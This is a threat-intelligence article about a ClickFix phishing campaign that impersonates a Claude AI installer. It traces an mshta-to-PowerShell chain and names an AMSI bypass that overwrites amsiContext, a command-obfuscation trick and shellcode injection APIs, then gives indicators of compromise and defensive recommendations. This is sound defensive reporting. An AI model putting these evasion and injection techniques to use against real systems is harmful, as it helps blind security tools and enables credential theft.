A sophisticated ClickFix phishing campaign masquerading as a legitimate installer for Anthropic’s Claude AI assistant. Deploying multi-layered PowerShell payloads and AMSI bypass techniques to compromise enterprise targets in the European Union and the United States.
ClickFix Phishing Campaign
ClickFix attacks are a well-documented social engineering tactic in which threat actors manipulate users into executing malicious commands, often by presenting fake error dialogs or software installation prompts.
What makes this latest campaign notable is its deceptive use of Claude, Anthropic’s widely recognized AI platform, as a lure to lower user suspicion during initial delivery.
Security Operations Center (SOC) first detected suspicious activity on April 9, 2026, when mshta.exe It was executed on a customer endpoint via the Windows Run utility.
The malicious command pointed to download-version[.]1-5-8[.]com/claude.msixbundle a URL crafted to impersonate an MSIX application bundle associated with the Claude AI tool. At the time of discovery, the campaign had minimal visibility on threat intelligence platforms like VirusTotal, indicating it was a new, actively evolving operation.
Multi-Stage Payload Delivery Chain
The campaign stands out for its multi-layered, evasion-heavy delivery architecture, leveraging several MITRE ATT&CK techniques in sequence to avoid detection at each stage.
Stage 1 – Fake MSIX Bundle via mshta:
The initial payload (claude.msixbundle, SHA-256: 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97) presents a misleading file header with a PK signature, suggesting it is a legitimate ZIP archive.
Buried within is an embedded HTML Application (HTA) file containing obfuscated Visual Basic Script. This technique aligns with MITRE ATT&CK T1218.005 (System Binary Proxy Execution: Mshta), where attackers exploit trusted Windows binaries to execute malicious payloads without triggering standard security controls.
Stage 2 – VBScript Deobfuscation and PowerShell Execution:
The VBS code within the HTA file runs a deobfuscation routine that reconstructs commands dynamically before invoking ShellExec to launch a heavily encoded PowerShell command via cmd.exe.
The command employs environment variable manipulation (set x=pow&&set y=ershell) to further frustrate signature-based detection engines. This corresponds to T1027.010 (Command Obfuscation) and T1059.001 (PowerShell) in the ATT&CK framework.
Stage 3 – AMSI Bypass via .NET Marshal:
The encoded PowerShell staging payload generates an MD5 hash derived from COMPUTERNAME and USERNAME environment variables, using the first 16 characters to craft a unique URL for fetching the next-stage script.
Critically, this stage deploys a known AMSI (Antimalware Scan Interface) bypass by overwriting the amsiContext field in System.Management.Automation.AmsiUtils with the value 0x41414141 via the .NET Marshal.WriteInt32 method effectively blinding Windows Defender and other AMSI-dependent security tools.
Stage 4 – Layered ScriptBlock Execution and Shellcode Injection:
Subsequent stages involve multiple nested PowerShell ScriptBlocks decoded from large Base64-encoded byte arrays. Each layer unpacks the next until the final block executes a process injection routine (T1055) using Windows API calls obtained via .NET interoperability. The encrypted shellcode passes through an XOR decryption routine before being injected using:
NtAllocateVirtualMemoryNtProtectVirtualMemoryNtCreateThreadExNtWaitForSingleObjectNtFreeVirtualMemoryNtClose
This fully fileless final stage is consistent with information-stealer deployment behavior, a common objective in ClickFix campaigns that have previously distributed Lumma Stealer, NetSupport RAT, and Latrodectus.
Detected and Contained the Threat
Detection was triggered by the rule “Attacker Technique – Remote Payload Execution via Run Utility (shell32.dll)”, which monitors the RunMRU registry key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU).
This key stores the last 26 commands executed through the Windows Run dialog, making it an invaluable forensic artifact for identifying ClickFix activity early in the kill chain. Upon alert, SOC analysts triaged the event, correlated indicators across the customer base, and initiated containment before the payload could progress to credential exfiltration.
Rapid7 Detection engineers simultaneously created additional behavioral rules and performed retroactive threat hunts using the campaign’s IOCs, demonstrating how MDR operations convert single incidents into enterprise-wide protections.
Indicators of Compromise (IOCs)
Organizations should immediately search for and block the following indicators:
- Malicious File Hash:
2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97Claudee.msixbundle) - Domain:
oakenfjrod[.]ru - Domain:
download-version[.]1-5-8[.]com - Domain:
download[.]get-version[.]com
Mitigation and Defensive Recommendations
Security teams should implement the following controls immediately:
- Monitor the RunMRU registry key for unexpected mshta, PowerShell, or cmd.exe entries passed via the Run dialog
- Block execution of mshta.exe in environments where it is not operationally required
- Enable PowerShell Constrained Language Mode and enforce Script Block Logging to capture obfuscated commands at runtime
- Audit AMSI integrity by monitoring for unauthorized writes to
AmsiUtilsvia.NETreflection - Deploy application allowlisting to prevent unsigned MSIX bundles from executing outside managed deployment channels.
- Reset credentials on any system where the infection chain progressed, as information stealers are the likely final payload.
- Inspect the browser clipboard content and browsing history to identify the phishing lure that delivered the initial Run command.
ClickFix phishing continues to evolve its lure themes, from fake CAPTCHA pages and Microsoft Office errors to popular AI software installers. As AI tools gain mainstream enterprise adoption, threat actors will increasingly exploit brand trust in platforms like Claude, ChatGPT, and Copilot to lower user suspicion.
MITRE ATT&CK Technique Coverage
| Technique ID | Name | Stage |
|---|---|---|
| T1218.005 | System Binary Proxy Execution: Mshta | Initial Execution |
| T1027.013 | Obfuscated Files: Encrypted/Encoded File | Payload Delivery |
| T1027.010 | Obfuscated Files: Command Obfuscation | PowerShell Stage |
| T1059.001 | Command & Scripting: PowerShell | Staging Payload |
| T1055 | Process Injection | Final Stage |
FAQ
Q1: What is a ClickFix attack, and why is it so effective?
A ClickFix attack tricks users into manually executing malicious commands by disguising them as legitimate software fixes or installations, bypassing automated security controls because the user themselves initiates the execution.
Q2: How did the ClaudeFix campaign disguise itself as legitimate software?
The campaign used a domain mimicking an official Claude AI download URL. It delivered a file with a valid ZIP header structure to impersonate a Microsoft Store MSIX bundle, deceiving both users and automated scanners.
Q3: What does AMSI bypass mean, and why is it dangerous?
AMSI (Antimalware Scan Interface) bypass turns off Windows’ built-in script inspection capability by corrupting internal memory structures, allowing subsequent malicious PowerShell code to execute without being detected by endpoint security tools.
Q4: How can organizations protect themselves from ClickFix campaigns targeting AI software lures?
Organizations should monitor the RunMRU registry key, block mshta execution, enforce PowerShell logging, deploy application allowlisting, and train users never to execute Run dialog commands prompted by websites or pop-up messages.
Site: thecybrdef.com
About the Author
